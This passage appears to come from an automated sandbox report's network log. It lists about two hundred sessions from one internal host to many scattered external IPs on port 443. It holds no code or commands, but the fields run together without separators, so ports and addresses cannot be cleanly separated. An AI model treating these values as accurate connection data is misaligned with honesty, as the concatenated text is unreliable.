                                                      19393192.168.2.145538272.100.85.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19394192.168.2.1459564111.178.19.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19395192.168.2.144966483.159.251.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19396192.168.2.1442018160.37.101.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19397192.168.2.1451994142.124.106.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19398192.168.2.1456964184.57.224.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19399192.168.2.144238246.243.172.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19400192.168.2.1444116171.198.98.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19401192.168.2.1446106172.104.243.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19402192.168.2.144949092.37.220.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19403192.168.2.1447928170.15.114.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19404192.168.2.144263853.214.2.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19405192.168.2.1436814216.21.128.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19406192.168.2.1449922167.28.146.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19407192.168.2.145730273.92.147.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19408192.168.2.1442402172.182.103.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19409192.168.2.1436126134.224.67.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19410192.168.2.144462694.3.234.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19411192.168.2.144878065.184.28.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19412192.168.2.1439640101.171.210.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19413192.168.2.1434110103.240.135.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19414192.168.2.1437968180.213.79.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19415192.168.2.1437266197.170.195.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19416192.168.2.145312447.70.151.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19417192.168.2.1454310216.211.85.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19418192.168.2.1435822198.55.162.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19419192.168.2.143277238.202.17.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19420192.168.2.1457480181.141.21.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19421192.168.2.145842817.72.110.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19422192.168.2.1452634165.74.178.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19423192.168.2.143331697.35.47.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19424192.168.2.145142696.42.29.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19425192.168.2.145453448.103.43.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19426192.168.2.144774274.170.166.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19427192.168.2.1432784158.44.240.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19428192.168.2.1449956138.175.71.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19429192.168.2.1442284203.59.204.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19430192.168.2.1449066119.93.89.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19431192.168.2.1457740179.250.162.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19432192.168.2.144140418.240.115.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19433192.168.2.1443324142.123.115.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19434192.168.2.1432782111.28.126.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19435192.168.2.1442834160.173.42.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19436192.168.2.1448314196.178.176.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19437192.168.2.143502661.161.39.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19438192.168.2.145711018.87.112.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19439192.168.2.145821678.241.197.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19440192.168.2.145834218.6.89.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19441192.168.2.1433396208.58.195.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19442192.168.2.145977844.169.222.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19443192.168.2.1446230176.152.35.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19444192.168.2.145851223.218.168.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19445192.168.2.1455878180.47.222.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19446192.168.2.1453184108.112.217.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19447192.168.2.1450988107.42.38.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19448192.168.2.145975454.149.37.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19449192.168.2.145574662.199.199.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19450192.168.2.1441458183.158.132.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19451192.168.2.1457042121.32.223.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19452192.168.2.1439164206.131.40.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19453192.168.2.143489620.44.57.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19454192.168.2.1442942141.30.237.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19455192.168.2.144390657.149.245.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19456192.168.2.145456499.18.72.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19457192.168.2.143588862.65.219.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19458192.168.2.145481698.21.124.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19459192.168.2.145243850.125.26.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19460192.168.2.1446640103.210.117.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19461192.168.2.1459168180.5.148.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19462192.168.2.145001086.213.68.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19463192.168.2.1444472151.198.120.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19464192.168.2.1439050149.201.44.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19465192.168.2.1440944133.195.7.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19466192.168.2.1455336138.216.112.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19467192.168.2.1435016145.122.107.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19468192.168.2.143822854.139.200.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19469192.168.2.1444212116.216.148.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19470192.168.2.145913482.139.129.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19471192.168.2.1443160206.18.101.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19472192.168.2.145185689.95.251.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19473192.168.2.144163291.134.120.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19474192.168.2.1460174163.31.174.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19475192.168.2.143935850.30.144.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19476192.168.2.14376704.125.199.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19477192.168.2.1446636184.232.102.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19478192.168.2.1448910126.93.106.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19479192.168.2.145223484.40.25.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19480192.168.2.144884289.139.100.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19481192.168.2.144406095.98.240.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19482192.168.2.144967886.88.135.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19483192.168.2.1447798174.125.12.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19484192.168.2.1450916193.186.171.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19485192.168.2.144478886.214.154.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19486192.168.2.1449414101.143.183.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19487192.168.2.1449248210.62.181.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19488192.168.2.1451346211.232.24.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19489192.168.2.145987083.30.40.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19490192.168.2.145667241.55.71.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19491192.168.2.1444280104.113.116.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19492192.168.2.143690261.139.104.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19493192.168.2.1450050179.113.181.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19494192.168.2.143328294.223.148.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19495192.168.2.1439620152.177.208.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19496192.168.2.1453808151.125.147.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19497192.168.2.1440724118.125.168.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19498192.168.2.144619459.144.158.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19499192.168.2.14444925.206.26.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19500192.168.2.145789660.232.138.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19501192.168.2.1456056198.33.63.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19502192.168.2.1436086198.209.255.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19503192.168.2.1434590132.251.179.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19504192.168.2.1445374103.244.102.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19505192.168.2.1447354219.162.11.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19506192.168.2.1454598181.141.209.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19507192.168.2.1437372183.150.226.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19508192.168.2.1443924112.212.243.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19509192.168.2.1457874148.123.40.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19510192.168.2.1436208114.223.136.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19511192.168.2.144167044.192.194.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19512192.168.2.1449278202.239.238.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19513192.168.2.1438634184.227.56.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19514192.168.2.145257819.38.235.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19515192.168.2.1449598220.110.138.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19516192.168.2.1435036183.254.127.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19517192.168.2.1445058173.75.109.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19518192.168.2.144834890.58.90.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19519192.168.2.1438642182.106.42.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19520192.168.2.1452384125.141.71.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19521192.168.2.1442930133.38.177.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19522192.168.2.145164636.243.17.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19523192.168.2.143931449.75.208.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19524192.168.2.1451422172.5.45.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19525192.168.2.1450990178.228.228.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19526192.168.2.143799213.65.127.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19527192.168.2.1435688117.126.104.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19528192.168.2.145157635.34.118.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19529192.168.2.1435884179.130.57.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19530192.168.2.144707678.206.90.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19531192.168.2.144318049.169.126.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19532192.168.2.1453738142.1.112.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19533192.168.2.143869271.71.86.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19534192.168.2.146067647.19.32.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19535192.168.2.1439678218.169.215.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19536192.168.2.143672093.164.18.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19537192.168.2.1450426138.133.15.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19538192.168.2.143911651.181.239.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19539192.168.2.1444210207.159.232.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19540192.168.2.1453062173.44.104.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19541192.168.2.144880498.243.71.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19542192.168.2.1434436160.167.153.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19543192.168.2.1439392153.18.185.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19544192.168.2.1436192114.175.62.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19545192.168.2.1449582172.135.177.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19546192.168.2.144618637.34.191.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19547192.168.2.1444750150.210.8.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19548192.168.2.1439088202.102.68.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19549192.168.2.143713614.204.16.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19550192.168.2.1453478188.114.93.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19551192.168.2.1437788100.62.182.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19552192.168.2.1438008144.151.66.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19553192.168.2.1439032172.177.202.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19554192.168.2.1444580108.81.26.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19555192.168.2.1438868195.111.24.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19556192.168.2.145267019.92.87.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19557192.168.2.145112679.93.29.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19558192.168.2.1440034115.76.187.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19559192.168.2.1445882121.178.59.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19560192.168.2.143794099.236.190.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19561192.168.2.143452262.83.236.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19562192.168.2.1439546179.158.254.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19563192.168.2.1447544205.69.207.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19564192.168.2.1448752220.241.226.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19565192.168.2.1452524163.207.103.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19566192.168.2.1439534101.179.241.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19567192.168.2.1434496204.53.101.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19568192.168.2.1455072101.49.94.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19569192.168.2.1451876116.166.132.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19570192.168.2.143842860.71.255.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19571192.168.2.1454956201.54.174.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19572192.168.2.143418851.169.128.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19573192.168.2.143604299.190.102.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19574192.168.2.145009652.6.241.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19575192.168.2.145156684.90.223.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19576192.168.2.1440238100.249.147.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19577192.168.2.1444172119.94.115.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19578192.168.2.146075643.88.126.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19579192.168.2.144507681.12.47.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19580192.168.2.144171653.82.28.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19581192.168.2.1445630178.90.130.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19582192.168.2.145107452.18.100.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19583192.168.2.144693414.62.53.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19584192.168.2.1454002221.128.123.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19585192.168.2.145133027.175.59.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19586192.168.2.1446486143.24.111.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19587192.168.2.14348084.162.78.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19588192.168.2.1446814192.235.174.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19589192.168.2.143585827.100.215.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19590192.168.2.145646040.15.163.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19591192.168.2.1453096139.184.93.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19592192.168.2.144878625.8.148.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19593192.168.2.144307096.187.102.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19594192.168.2.1458060125.167.70.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19595192.168.2.1454182190.43.246.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19596192.168.2.1447450201.67.107.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19597192.168.2.144862257.231.124.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19598192.168.2.1460640158.20.222.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19599192.168.2.1458118143.89.11.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19600192.168.2.1453052199.98.74.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19601192.168.2.145236019.22.233.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19602192.168.2.1446238165.33.174.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19603192.168.2.1457180163.218.20.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19604192.168.2.143321483.62.128.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19605192.168.2.1445310217.247.242.140443
